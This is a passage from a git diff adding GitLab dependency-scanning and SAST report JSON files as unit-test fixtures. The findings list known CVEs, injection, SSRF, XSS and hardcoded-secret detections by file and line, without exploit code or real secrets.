Unreachable Exit Condition (Infinite Loop) in golang.org/x/text", + "description": "The `x/text` package for Go has a vulnerability in `encoding/unicode` that could lead to the `UTF-16` decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a `UTF16` decoder instantiated with `UseBOM` or `ExpectBOM` to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to `golang.org/x/text/transform.String`.", + "cve": "service/go.sum:golang.org/x/text:gemnasium:8ab0265a-d1a9-4085-a661-0d9d9931f0ad", + "severity": "High", + "solution": "Upgrade to version 0.3.3 or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { + "name": "golang.org/x/text" + }, + "version": "v0.3.0" + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-8ab0265a-d1a9-4085-a661-0d9d9931f0ad", + "value": "8ab0265a-d1a9-4085-a661-0d9d9931f0ad", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/golang.org/x/text/CVE-2020-14040.yml" + }, + { + "type": "cve", + "name": "CVE-2020-14040", + "value": "CVE-2020-14040", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14040" + } + ], + "links": [ + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14040" + } + ] + }, + { + "id": "f9d0c9f6512b04b2c2414a3cb81389e27c6b73291d3471ff2cf365f7fe8ca388", + "category": "dependency_scanning", + "name": "Loop with Unreachable Exit Condition (Infinite Loop)", + "message": "Loop with Unreachable Exit Condition (Infinite Loop) in golang.org/x/text", + "description": "The `x/text` package for Go has a vulnerability in `encoding/unicode` that could lead to the `UTF-16` decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a `UTF16` decoder instantiated with `UseBOM` or `ExpectBOM` to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to `golang.org/x/text/transform.String`.", + "cve": "service/go.sum:golang.org/x/text:gemnasium:8ab0265a-d1a9-4085-a661-0d9d9931f0ad", + "severity": "High", + "solution": "Upgrade to version 0.3.3 or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { + "name": "golang.org/x/text" + }, + "version": "v0.3.2" + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-8ab0265a-d1a9-4085-a661-0d9d9931f0ad", + "value": "8ab0265a-d1a9-4085-a661-0d9d9931f0ad", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/golang.org/x/text/CVE-2020-14040.yml" + }, + { + "type": "cve", + "name": "CVE-2020-14040", + "value": "CVE-2020-14040", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14040" + } + ], + "links": [ + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14040" + } + ] + }, + { + "id": "2d8b607cb56d9866c73cdcf33a016f64b4fa37d909c1dd300037b1ac026a3ca5", + "category": "dependency_scanning", + "name": "XML Entity Expansion", + "message": "XML Entity Expansion in gopkg.in/yaml.v2", + "description": "go-yaml is vulnerable to a Billion Laughs Attack.", + "cve": "service/go.sum:gopkg.in/yaml.v2:gemnasium:7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "severity": "Unknown", + "solution": "Upgrade to version 2.2.3 or above.", + "scanner": { + "id": "gemnasium", + "name": "Gemnasium" + }, + "location": { + "file": "service/go.sum", + "dependency": { + "package": { + "name": "gopkg.in/yaml.v2" + }, + "version": "v2.2.2" + } + }, + "identifiers": [ + { + "type": "gemnasium", + "name": "Gemnasium-7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "value": "7368f513-0aa9-4e34-a08d-40ea81f48e0e", + "url": "https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/go/gopkg.in/yaml.v2/GMS-2019-2.yml" + } + ], + "links": [ + { + "url": "https://github.com/docker/cli/pull/2117" + } + ] + } + ], + "remediations": [], + "dependency_files": [ + { + "path": "service/go.sum", + "package_manager": "go", + "dependencies": [ + { + "package": { + "name": "github.com/alcortesm/tgz" + }, + "version": "v0.0.0-20161220082320-9c5fe88206d7" + }, + { + "package": { + "name": "github.com/anmitsu/go-shlex" + }, + "version": "v0.0.0-20161002113705-648efa622239" + }, + { + "package": { + "name": "github.com/armon/go-socks5" + }, + "version": "v0.0.0-20160902184237-e75332964ef5" + }, + { + "package": { + "name": "github.com/creack/pty" + }, + "version": "v1.1.9" + }, + { + "package": { + "name": "github.com/davecgh/go-spew" + }, + "version": "v1.1.0" + }, + { + "package": { + "name": "github.com/davecgh/go-spew" + }, + "version": "v1.1.1" + }, + { + "package": { + "name": "github.com/emirpasic/gods" + }, + "version": "v1.12.0" + }, + { + "package": { + "name": "github.com/flynn/go-shlex" + }, + "version": "v0.0.0-20150515145356-3f9db97f8568" + }, + { + "package": { + "name": "github.com/gliderlabs/ssh" + }, + "version": "v0.2.2" + }, + { + "package": { + "name": "github.com/go-git/gcfg" + }, + "version": "v1.5.0" + }, + { + "package": { + "name": "github.com/go-git/go-billy/v5" + }, + "version": "v5.0.0" + }, + { + "package": { + "name": "github.com/go-git/go-git-fixtures/v4" + }, + "version": "v4.0.2-0.20200613231340-f56387b50c12" + }, + { + "package": { + "name": "github.com/go-git/go-git/v5" + }, + "version": "v5.2.0" + }, + { + "package": { + "name": "github.com/golang/protobuf" + }, + "version": "v1.2.0" + }, + { + "package": { + "name": "github.com/google/go-cmp" + }, + "version": "v0.3.0" + }, + { + "package": { + "name": "github.com/google/go-querystring" + }, + "version": "v1.0.0" + }, + { + "package": { + "name": "github.com/hashicorp/go-cleanhttp" + }, + "version": "v0.5.1" + }, + { + "package": { + "name": "github.com/hashicorp/go-hclog" + }, + "version": "v0.9.2" + }, + { + "package": { + "name": "github.com/hashicorp/go-retryablehttp" + }, + "version": "v0.6.4" + }, + { + "package": { + "name": "github.com/imdario/mergo" + }, + "version": "v0.3.9" + }, + { + "package": { + "name": "github.com/jbenet/go-context" + }, + "version": "v0.0.0-20150711004518-d14ea06fba99" + }, + { + "package": { + "name": "github.com/jessevdk/go-flags" + }, + "version": "v1.4.0" + }, + { + "package": { + "name": "github.com/kevinburke/ssh_config" + }, + "version": "v0.0.0-20190725054713-01f96b0aa0cd" + }, + { + "package": { + "name": "github.com/kr/pretty" + }, + "version": "v0.1.0" + }, + { + "package": { + "name": "github.com/kr/pty" + }, + "version": "v1.1.1" + }, + { + "package": { + "name": "github.com/kr/text" + }, + "version": "v0.1.0" + }, + { + "package": { + "name": "github.com/kr/text" + }, + "version": "v0.2.0" + }, + { + "package": { + "name": "github.com/mitchellh/go-homedir" + }, + "version": "v1.1.0" + }, + { + "package": { + "name": "github.com/niemeyer/pretty" + }, + "version": "v0.0.0-20200227124842-a10e7caefd8e" + }, + { + "package": { + "name": "github.com/pkg/errors" + }, + "version": "v0.8.1" + }, + { + "package": { + "name": "github.com/pmezard/go-difflib" + }, + "version": "v1.0.0" + }, + { + "package": { + "name": "github.com/sergi/go-diff" + }, + "version": "v1.1.0" + }, + { + "package": { + "name": "github.com/stretchr/objx" + }, + "version": "v0.1.0" + }, + { + "package": { + "name": "github.com/stretchr/testify" + }, + "version": "v1.2.2" + }, + { + "package": { + "name": "github.com/stretchr/testify" + }, + "version": "v1.4.0" + }, + { + "package": { + "name": "github.com/xanzy/go-gitlab" + }, + "version": "v0.38.2" + }, + { + "package": { + "name": "github.com/xanzy/ssh-agent" + }, + "version": "v0.2.1" + }, + { + "package": { + "name": "golang.org/x/crypto" + }, + "version": "v0.0.0-20190219172222-a4c6cb3142f2" + }, + { + "package": { + "name": "golang.org/x/crypto" + }, + "version": "v0.0.0-20190308221718-c2843e01d9a2" + }, + { + "package": { + "name": "golang.org/x/crypto" + }, + "version": "v0.0.0-20200302210943-78000ba7a073" + }, + { + "package": { + "name": "golang.org/x/net" + }, + "version": "v0.0.0-20180724234803-3673e40ba225" + }, + { + "package": { + "name": "golang.org/x/net" + }, + "version": "v0.0.0-20181108082009-03003ca0c849" + }, + { + "package": { + "name": "golang.org/x/net" + }, + "version": "v0.0.0-20190404232315-eb5bcb51f2a3" + }, + { + "package": { + "name": "golang.org/x/net" + }, + "version": "v0.0.0-20200301022130-244492dfa37a" + }, + { + "package": { + "name": "golang.org/x/oauth2" + }, + "version": "v0.0.0-20181106182150-f42d05182288" + }, + { + "package": { + "name": "golang.org/x/sync" + }, + "version": "v0.0.0-20181108010431-42b317875d0f" + }, + { + "package": { + "name": "golang.org/x/sys" + }, + "version": "v0.0.0-20190215142949-d0b11bdaac8a" + }, + { + "package": { + "name": "golang.org/x/sys" + }, + "version": "v0.0.0-20190221075227-b4e8571b14e0" + }, + { + "package": { + "name": "golang.org/x/sys" + }, + "version": "v0.0.0-20190412213103-97732733099d" + }, + { + "package": { + "name": "golang.org/x/sys" + }, + "version": "v0.0.0-20200302150141-5c8b2ff67527" + }, + { + "package": { + "name": "golang.org/x/text" + }, + "version": "v0.3.0" + }, + { + "package": { + "name": "golang.org/x/text" + }, + "version": "v0.3.2" + }, + { + "package": { + "name": "golang.org/x/time" + }, + "version": "v0.0.0-20191024005414-555d28b269f0" + }, + { + "package": { + "name": "golang.org/x/tools" + }, + "version": "v0.0.0-20180917221912-90fa682c2a6e" + }, + { + "package": { + "name": "google.golang.org/appengine" + }, + "version": "v1.3.0" + }, + { + "package": { + "name": "gopkg.in/check.v1" + }, + "version": "v0.0.0-20161208181325-20d25e280405" + }, + { + "package": { + "name": "gopkg.in/check.v1" + }, + "version": "v1.0.0-20190902080502-41f04d3bba15" + }, + { + "package": { + "name": "gopkg.in/check.v1" + }, + "version": "v1.0.0-20200227125254-8fa46927fb4f" + }, + { + "package": { + "name": "gopkg.in/warnings.v0" + }, + "version": "v0.1.2" + }, + { + "package": { + "name": "gopkg.in/yaml.v2" + }, + "version": "v2.2.2" + }, + { + "package": { + "name": "gopkg.in/yaml.v2" + }, + "version": "v2.2.4" + } + ] + } + ], + "scan": { + "scanner": { + "id": "gemnasium", + "name": "Gemnasium", + "url": "https://gitlab.com/gitlab-org/security-products/analyzers/gemnasium", + "vendor": { + "name": "GitLab" + }, + "version": "2.24.1" + }, + "type": "dependency_scanning", + "start_time": "2020-12-23T09:49:18", + "end_time": "2020-12-23T09:49:19", + "status": "success" + } +} diff --git a/unittests/scans/gitlab_sast/gl-sast-report-1-vuln.json b/unittests/scans/gitlab_sast/gl-sast-report-1-vuln.json new file mode 100644 index 00000000000..33e7452ca46 --- /dev/null +++ b/unittests/scans/gitlab_sast/gl-sast-report-1-vuln.json @@ -0,0 +1,34 @@ +{ + "version": "2.3", + "vulnerabilities": [ + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "docker-compose.override.unit_tests.yml:4dd25cfea7294af80c58a87f764286ce21ec612e78ae7a208c0a92887870963b:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "docker-compose.override.unit_tests.yml", + "start_line": 19, + "end_line": 19, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + } + ], + "remediations": [] +} diff --git a/unittests/scans/gitlab_sast/gl-sast-report-confidence.json b/unittests/scans/gitlab_sast/gl-sast-report-confidence.json new file mode 100644 index 00000000000..aec205d5456 --- /dev/null +++ b/unittests/scans/gitlab_sast/gl-sast-report-confidence.json @@ -0,0 +1,269 @@ +{ + "version": "3.0.0", + "vulnerabilities": [ + { + "id": "c4c9c908068d938a0acf63c69b2e37c755bad1920f1a5d7b419ea5ae1a5fe5b1", + "category": "sast", + "name": "node_username", + "message": "A hardcoded username in plain text is identified. Store it properly in an environment variable.", + "description": "A hardcoded username in plain text is identified. Store it properly in an environment variable.", + "cve": "data/datacreator.js:246:node_username:CWE-798", + "severity": "High", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "data/datacreator.js", + "start_line": 246, + "end_line": 246 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "node_username", + "value": "A hardcoded username in plain text is identified. Store it properly in an environment variable." + }, + { + "type": "cwe", + "name": "CWE-798", + "value": "node_username" + } + ] + }, + { + "id": "5e5c3291fc206c0bc4bd0a1278e78967076ac093ed482fcb38c39ab161025c2f", + "category": "sast", + "name": "node_username", + "message": "A hardcoded username in plain text is identified. Store it properly in an environment variable.", + "description": "A hardcoded username in plain text is identified. Store it properly in an environment variable.", + "cve": "data/datacreator.js:250:node_username:CWE-798", + "severity": "High", + "confidence": "Ignore", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "data/datacreator.js", + "start_line": 250, + "end_line": 250 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "node_username", + "value": "A hardcoded username in plain text is identified. Store it properly in an environment variable." + }, + { + "type": "cwe", + "name": "CWE-798", + "value": "node_username" + } + ] + }, + { + "id": "5e6efd7a1bef47a9ebef9f1fd11fb11bd01e2f6f0decdd0316d3158750f7d391", + "category": "sast", + "name": "hardcoded_jwt_secret", + "message": "Hardcoded JWT secret was found. Store it properly in an environment variable.", + "description": "Hardcoded JWT secret was found. Store it properly in an environment variable.", + "cve": "lib/insecurity.js:9:hardcoded_jwt_secret:CWE-798", + "severity": "High", + "confidence": "Unkown", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "lib/insecurity.js", + "start_line": 9, + "end_line": 34 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "hardcoded_jwt_secret", + "value": "Hardcoded JWT secret was found. Store it properly in an environment variable." + }, + { + "type": "cwe", + "name": "CWE-798", + "value": "hardcoded_jwt_secret" + } + ] + }, + { + "id": "46af6f74b3a85f6b9009268e97027b75b378053ee8f81fc9aa8930d65ec2d468", + "category": "sast", + "name": "node_nosqli_injection", + "message": "Untrusted user input in findOne() function can result in NoSQL Injection.", + "description": "Untrusted user input in findOne() function can result in NoSQL Injection.", + "cve": "routes/likeProductReviews.js:13:node_nosqli_injection:CWE-943", + "severity": "High", + "confidence": "Experimental", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "routes/likeProductReviews.js", + "start_line": 13, + "end_line": 56 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "node_nosqli_injection", + "value": "Untrusted user input in findOne() function can result in NoSQL Injection." + }, + { + "type": "cwe", + "name": "CWE-943", + "value": "node_nosqli_injection" + } + ] + }, + { + "id": "ac0fb217a233731d52e8e2558ecaa49d139ccb863b9b9922e82349c2b571d54f", + "category": "sast", + "name": "node_sqli_injection", + "message": "Untrusted input concatinated with raw SQL query can result in SQL Injection.", + "description": "Untrusted input concatinated with raw SQL query can result in SQL Injection.", + "cve": "routes/login.js:29:node_sqli_injection:CWE-89", + "severity": "High", + "confidence": "Low", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "routes/login.js", + "start_line": 29, + "end_line": 29 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "node_sqli_injection", + "value": "Untrusted input concatinated with raw SQL query can result in SQL Injection." + }, + { + "type": "cwe", + "name": "CWE-89", + "value": "node_sqli_injection" + } + ] + }, + { + "id": "cdae14ebd54e5c96817e08c21686eaf72a47738b7c4af80faa6c284b5c8892f1", + "category": "sast", + "name": "node_ssrf", + "message": "User controlled URL in http client libraries can result in Server Side Request Forgery (SSRF).", + "description": "User controlled URL in http client libraries can result in Server Side Request Forgery (SSRF).", + "cve": "routes/profileImageUrlUpload.js:15:node_ssrf:CWE-918", + "severity": "High", + "confidence": "Medium", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "routes/profileImageUrlUpload.js", + "start_line": 15, + "end_line": 34 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "node_ssrf", + "value": "User controlled URL in http client libraries can result in Server Side Request Forgery (SSRF)." + }, + { + "type": "cwe", + "name": "CWE-918", + "value": "node_ssrf" + } + ] + }, + { + "id": "9b5327ba93ebcf995af9d64176e2af564ff23d88b3a545cb2b9020a77d2f1d9a", + "category": "sast", + "name": "node_ssrf", + "message": "User controlled URL in http client libraries can result in Server Side Request Forgery (SSRF).", + "description": "User controlled URL in http client libraries can result in Server Side Request Forgery (SSRF).", + "cve": "routes/profileImageUrlUpload.js:17:node_ssrf:CWE-918", + "severity": "High", + "confidence": "High", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "routes/profileImageUrlUpload.js", + "start_line": 17, + "end_line": 17 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "node_ssrf", + "value": "User controlled URL in http client libraries can result in Server Side Request Forgery (SSRF)." + }, + { + "type": "cwe", + "name": "CWE-918", + "value": "node_ssrf" + } + ] + }, + { + "id": "863c039d992efa87e76afe04831d0b986a7f492a6badc3cd04e6cfab4e90ee09", + "category": "sast", + "name": "node_sqli_injection", + "message": "Untrusted input concatinated with raw SQL query can result in SQL Injection.", + "description": "Untrusted input concatinated with raw SQL query can result in SQL Injection.", + "cve": "routes/search.js:12:node_sqli_injection:CWE-89", + "severity": "High", + "confidence": "Confirmed", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "routes/search.js", + "start_line": 12, + "end_line": 58 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "node_sqli_injection", + "value": "Untrusted input concatinated with raw SQL query can result in SQL Injection." + }, + { + "type": "cwe", + "name": "CWE-89", + "value": "node_sqli_injection" + } + ] + } + ], + "remediations": [], + "scan": { + "scanner": { + "id": "njsscan", + "name": "njsscan", + "url": "https://github.com/ajinabraham/njsscan", + "vendor": { + "name": "GitLab" + }, + "version": "0.1.9" + }, + "type": "sast", + "start_time": "2020-12-30T07:17:08", + "end_time": "2020-12-30T07:18:45", + "status": "success" + } + } + \ No newline at end of file diff --git a/unittests/scans/gitlab_sast/gl-sast-report-cwe.json b/unittests/scans/gitlab_sast/gl-sast-report-cwe.json new file mode 100644 index 00000000000..ed09bf84f13 --- /dev/null +++ b/unittests/scans/gitlab_sast/gl-sast-report-cwe.json @@ -0,0 +1,122 @@ +{ + "version": "3.0.0", + "vulnerabilities": [ + { + "id": "38e1bf843be70b01cd6847ba877897acb4185d3445256f818871a4b66c0af712", + "category": "sast", + "name": "Servlet reflected cross site scripting vulnerability", + "message": "Servlet reflected cross site scripting vulnerability", + "description": "HTTP parameter written to Servlet output in servlets.module.lesson.XssLesson.doPost(HttpServletRequest, HttpServletResponse)", + "cve": "3e7ef723fe684a84eb7f9a94b27d1ea2:XSS_REQUEST_PARAMETER_TO_SERVLET_WRITER:src/main/java/servlets/module/lesson/XssLesson.java:96", + "severity": "High", + "confidence": "Medium", + "scanner": { + "id": "find_sec_bugs", + "name": "Find Security Bugs" + }, + "location": { + "file": "src/main/java/servlets/module/lesson/XssLesson.java", + "start_line": 96, + "end_line": 96, + "class": "servlets.module.lesson.XssLesson", + "method": "doPost" + }, + "identifiers": [ + { + "type": "find_sec_bugs_type", + "name": "Find Security Bugs-XSS_REQUEST_PARAMETER_TO_SERVLET_WRITER", + "value": "XSS_REQUEST_PARAMETER_TO_SERVLET_WRITER", + "url": "https://spotbugs.readthedocs.io/en/latest/bugDescriptions.html#xss-servlet-reflected-cross-site-scripting-vulnerability-xss-request-parameter-to-servlet-writer" + }, + { + "type": "cwe", + "name": "CWE-79", + "value": "79", + "url": "https://cwe.mitre.org/data/definitions/79.html" + } + ] + }, + { + "id": "41be9454f42f7effeefe0ca644a74c2ba64cfe7ad1990c4efd60904afbe94b3c", + "category": "sast", + "name": "Nonconstant string passed to execute or addBatch method on an SQL statement", + "message": "Nonconstant string passed to execute or addBatch method on an SQL statement", + "description": "servlets.module.lesson.SqlInjectionLesson.getSqlInjectionResult(String, String) passes a nonconstant String to an execute or addBatch method on an SQL statement", + "cve": "10b6dd4f1881b067a00b77b2b910e433:SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE:src/main/java/servlets/module/lesson/SqlInjectionLesson.java:136", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "find_sec_bugs", + "name": "Find Security Bugs" + }, + "location": { + "file": "src/main/java/servlets/module/lesson/SqlInjectionLesson.java", + "start_line": 136, + "end_line": 136, + "class": "servlets.module.lesson.SqlInjectionLesson", + "method": "getSqlInjectionResult" + }, + "identifiers": [ + { + "type": "find_sec_bugs_type", + "name": "Find Security Bugs-SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE", + "value": "SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE", + "url": "https://spotbugs.readthedocs.io/en/latest/bugDescriptions.html#sql-nonconstant-string-passed-to-execute-or-addbatch-method-on-an-sql-statement-sql-nonconstant-string-passed-to-execute" + }, + { + "type": "cwe", + "name": "CWE-89", + "value": 89, + "url": "https://cwe.mitre.org/data/definitions/89.html" + } + ] + }, + { + "id": "46af6f74b3a85f6b9009268e97027b75b378053ee8f81fc9aa8930d65ec2d468", + "category": "sast", + "name": "node_nosqli_injection", + "message": "Untrusted user input in findOne() function can result in NoSQL Injection.", + "description": "Untrusted user input in findOne() function can result in NoSQL Injection.", + "cve": "routes/likeProductReviews.js:13:node_nosqli_injection:CWE-943", + "severity": "High", + "confidence": "Experimental", + "scanner": { + "id": "nodejs-scan", + "name": "NodeJsScan" + }, + "location": { + "file": "routes/likeProductReviews.js", + "start_line": 13, + "end_line": 56 + }, + "identifiers": [ + { + "type": "njsscan_rule_type", + "name": "node_nosqli_injection", + "value": "Untrusted user input in findOne() function can result in NoSQL Injection." + }, + { + "type": "cwe", + "name": "CWE-943", + "value": "node_nosqli_injection" + } + ] + } + ], + "remediations": [], + "scan": { + "scanner": { + "id": "find_sec_bugs", + "name": "Find Security Bugs", + "url": "https://spotbugs.github.io", + "vendor": { + "name": "GitLab" + }, + "version": "4.2.0" + }, + "type": "sast", + "start_time": "2020-12-21T17:33:58", + "end_time": "2020-12-21T17:38:43", + "status": "success" + } + } \ No newline at end of file diff --git a/unittests/scans/gitlab_sast/gl-sast-report-many-vuln.json b/unittests/scans/gitlab_sast/gl-sast-report-many-vuln.json new file mode 100644 index 00000000000..5efef7ccfd4 --- /dev/null +++ b/unittests/scans/gitlab_sast/gl-sast-report-many-vuln.json @@ -0,0 +1,13006 @@ +{ + "version": "2.3", + "vulnerabilities": [ + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "docker-compose.override.unit_tests.yml:4dd25cfea7294af80c58a87f764286ce21ec612e78ae7a208c0a92887870963b:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "docker-compose.override.unit_tests.yml", + "start_line": 19, + "end_line": 19, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "docker-compose.yml:f118b746c89ea593e3d99a34330b35a9a46270e71dd253f0c9ff29507d3601fe:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "docker-compose.yml", + "start_line": 27, + "end_line": 27, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "PKCS8 key", + "message": "PKCS8 key", + "description": "PKCS8 private key detected; please remove and revoke it if this is a leak.", + "cve": "docker/key.pem:3021d90eb9437b2d8f30e8363695c4418b5e5f1870801b5c317e9398ee0f572d:PKCS8", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "gitleaks", + "name": "Gitleaks" + }, + "location": { + "file": "docker/key.pem", + "start_line": 1, + "end_line": 52, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "gitleaks_rule_id", + "name": "Gitleaks rule ID PKCS8", + "value": "PKCS8" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "dojo/settings/settings.dist.py:ac48da3029b35c40a4126d516386d226bbe00c27f9d6b44834458c29ef9d8779:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "dojo/settings/settings.dist.py", + "start_line": 155, + "end_line": 155, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "dojo/unittests/scans/sonarqube/sonar-6-findings.html:918c6716cd1d9901f678ac3aaf725ccb381ae66f63c84d3f2001e083743b4971:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-6-findings.html", + "start_line": 2590, + "end_line": 2590, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "dojo/unittests/scans/sonarqube/sonar-no-finding.html:918c6716cd1d9901f678ac3aaf725ccb381ae66f63c84d3f2001e083743b4971:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-no-finding.html", + "start_line": 29890, + "end_line": 29890, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "dojo/unittests/scans/sonarqube/sonar-rule-undefined.html:918c6716cd1d9901f678ac3aaf725ccb381ae66f63c84d3f2001e083743b4971:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-rule-undefined.html", + "start_line": 359, + "end_line": 359, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "dojo/unittests/scans/sonarqube/sonar-single-finding.html:918c6716cd1d9901f678ac3aaf725ccb381ae66f63c84d3f2001e083743b4971:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-single-finding.html", + "start_line": 2539, + "end_line": 2539, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "dojo/unittests/scans/sonarqube/sonar-table-in-table.html:918c6716cd1d9901f678ac3aaf725ccb381ae66f63c84d3f2001e083743b4971:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "dojo/unittests/scans/sonarqube/sonar-table-in-table.html", + "start_line": 359, + "end_line": 359, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "entrypoint_scripts/os/linux.sh:4d29e6f03b929e137462e9e8691ff7e7463048983b6ba57fb760aae13c11a75b:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "entrypoint_scripts/os/linux.sh", + "start_line": 136, + "end_line": 136, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + }, + { + "category": "sast", + "name": "Password in URL", + "message": "Password in URL", + "description": "Password in URL detected; please remove and revoke it if this is a leak.", + "cve": "entrypoint_scripts/run/startup-docker.bash:32f21f0a91c39a44f0da1c77143262107220fe53230553d0acfc5f21e09127df:Password in URL", + "severity": "Critical", + "confidence": "Unknown", + "scanner": { + "id": "trufflehog", + "name": "TruffleHog" + }, + "location": { + "file": "entrypoint_scripts/run/startup-docker.bash", + "start_line": 13, + "end_line": 13, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "trufflehog_rule_id", + "name": "TruffleHog rule ID Password in URL", + "value": "Password in URL" + } + ] + 